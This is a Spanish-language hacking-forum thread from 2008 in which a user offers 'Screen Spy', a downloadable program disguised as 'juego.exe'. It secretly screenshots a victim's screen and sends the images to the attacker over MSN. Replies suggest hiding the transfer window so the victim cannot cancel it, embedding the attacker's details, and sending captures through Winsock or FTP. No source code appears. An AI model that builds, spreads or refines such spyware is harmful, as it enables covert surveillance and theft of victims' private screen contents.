elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Ingresar Registrarse
29 Agosto 2008, 20:22  

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Man-In-the-Middle, Hendriҳ)
| | |-+  Screen Spy
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Screen Spy  (Leído 690 veces)
invisible_hack

Desconectado Desconectado

Mixer v2.0 - Genera passwords seguras con 1 click

Ver Perfil WWW
Screen Spy
« en: 22 Marzo 2008, 19:28 »

Bueno, aquí les presento mi nueva creacioncilla, he de decir lo primero que le debo dar muchos agradecimientos a Chefito, quien me ha hechado una mano (mejor dicho una manaza, porque me ha ayudado mucho jejeje) en el programa, y gracias a sus ayudas lo he podido llevar a cabo...

Posteo aquí la aplicación porque este software lo que hace es espiar la pantalla de nuestra victima mediante screenshots (por eso lo puse en esta sección de troyanos, pero si algun Mod considera oportuno moverlo, que lo mueva, por mi no problem xD)

Bien, lo que hace este programa es, una vez que la victima ha ejecutado el archivo juego.exe pues el programa toma cuatro screenshots de su pantalla (con 3 segundos entre cada una) y guarda esas imágenes en la propia carpeta de Mis Documentos de la victima, y luego, a traves de la propia conversacion de msn de la victima que tengamos abierta, nos llegarán esas cuatro fotos, que serán screens del Pc victima...

Deberemos ser habiles al aceptarlas, ya que la victima si se da cuenta puede cancelar la transferencia...

Bueno, más información en el archivo leeme.doc que he puesto dentro del .rar y por favor, antes de nada, leed la parte del Aviso legal del leeme.doc ¿de acuerdo?

Un saludo, espero que lo probeis y comenteis  :P

Link de descarga:: http://www.mediafire.com/?wdyzw31a5ec
« Última modificación: 26 Marzo 2008, 00:10 por ANELKAOS » En línea

VISITAD MI FORO DE INFORMÁTICA, HACKING Y MUCHO MÁS!!!!! (HAZ CLIC EN EL BANNER DE MI FIRMA)

www.invisiblehack.foro.st
octalh

"El sueño de la razón produce monstruos"

Ver Perfil WWW
Re: Screen Spy [By Invisible_Hack]
« Respuesta #1 en: 22 Marzo 2008, 22:28 »

Hola, invisible_hack, thanks por el aporte, como "tip" creo que no es necesario guardar dichas imágenes en la carpeta del usuario, puesto que con keybord event puedes presionar la tecla PRINT y posteriormente pegarla en conversación del msn con CTRL+V, solo tendrías que utilizar el clipboard.

de esa forma el programa podría mandar las imágenes cada X tiempo por el msn, si agregas un handle con nombre y no de la clase de la ventana, por ejemplo "conversación - Invisible hack", el programa podría diferenciar tu ventana de las demas, y únicamente mandar dichas screenshots al atacante, y no a el usuario que tenga la ventana activa de conversación.

salu2

「エステバン 」
ReCoLeCtAr DaToS eS SoLo El PriMeR pASo A la SaBiDuRIa
PeRo CoMpArTiR DaToS eS eL pRiMeR pAsO a La CoMuNidAD...

http://www.octalh.mx.gs/

http://www.aztekmindz.org
invisible_hack

Ver Perfil WWW
« Respuesta #2 en: 22 Marzo 2008, 23:36 »

Gracias por ese punto del clipboard, lo anoto para implementarlo en la próxima versión... :P

En cuanto a lo del handle de la ventana para que se envien las fotos a una ventana en concreto pues...eso serviría si solo usase yo el programa, pero imaginate, que yo pongo eso que has dicho tu de "conversación- Invisible_Hack" pues, suponiendo que yo tuviese como nick en mi msn "Invisible_Hack" pues me enviaria a mi las fotos, si, pero...¿y si lo usa otra persona? No funcionaria, puesto que buscaria "Invisible_Hack" en el titulo de la ventana y no lo encontraría...

Por eso, lo que yo ando buscando, es que, de algun modo, cuando el atakante envie el .exe por el msn a su victima, el programa "memorice" de alguna forma el nick que tiene el atakante, y que luego envie las fotos a la ventana que tenga tal nick...

Saludos!!

VISITAD MI FORO DE INFORMÁTICA, HACKING Y MUCHO MÁS!!!!! (HAZ CLIC EN EL BANNER DE MI FIRMA)

Hacker_Zero

Nunca digas es imposible....

Ver Perfil WWW
« Respuesta #3 en: 23 Marzo 2008, 00:46 »

Si usas la API de Msn te sería mas fácil enviar las fotos, podrías hacer un edit server de alguna manera para introducir en el exe los datos del atacante y que lo envíe sólo a ese contacto mediante la API. Otra cosa que estaría bien sería que la ventana de msn por la cual se envían las capturas desde la víctima que se oculten de alguna forma para que el user no pueda cancelarlas. Otra opción sería mandar las capturas mediante Winsock, pero eso ya sería el módulo de un troyano, XD. Si encuentro alguna información posteo el código. Muy bueno el programa, te felicito.
Saludos

Lewert

Ver Perfil
« Respuesta #4 en: 23 Marzo 2008, 03:58 »

¿Y porque no ocultas la ventana cuando la victima te envia las imagenes?

Crack the bytes, crack your self
octalh

"El sueño de la razón produce monstruos"

Ver Perfil WWW
« Respuesta #5 en: 23 Marzo 2008, 20:58 »

Si alguien sabe como abrir la ventana oculta en delphi me dice  :rolleyes:

「エステバン 」
ReCoLeCtAr DaToS eS SoLo El PriMeR pASo A la SaBiDuRIa
PeRo CoMpArTiR DaToS eS eL pRiMeR pAsO a La CoMuNidAD...

http://www.octalh.mx.gs/

http://www.aztekmindz.org
invisible_hack

Ver Perfil WWW
« Respuesta #6 en: 23 Marzo 2008, 23:36 »

Si alguien sabe como abrir la ventana oculta en delphi me dice  :rolleyes:

Pero no está hecho en Delphi ¿eh?

Saludos!!

Hacker_Zero

Nunca digas es imposible....

Ver Perfil WWW
« Respuesta #7 en: 24 Marzo 2008, 13:16 »

Ya decía yo, jaja. Bueno, yo creo que lo puedes mejorar mucho usand la API de Msn, ocultando la ventana en la que envías el archivo y quizás con winsock o enviando los screens por ftp.
Saludos

741852

visca la pepaaaaa!

Ver Perfil
« Respuesta #8 en: 24 Marzo 2008, 14:45 »

Deberemos ser habiles al aceptarlas, ya que la victima si se da cuenta puede cancelar la transferencia...
Sí..lo más seguro es que la cancele.. tendríais que enviarlo de una manera oculta... porque si no ...

se ve simple y sencillo el programa pero por algo se empieza...

salu2

EASY-ADS:

- 0.005$ click
- 0.005$ click referido
- payout: 0.50$ !
- 10-16 ads diarios
- pago en 1 día
- pago mediante paypal

Regístrate aquí:
http://www.easy-ads.info/register.php?r=sagitari
Porfa, no me elimines como referida
Aquí la prueba de que sí que pagan:
http://img295.imageshack.us/img295/8939/easy1pc4.png
Páginas: [1] Ir Arriba Imprimir 
Ir a:  

Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.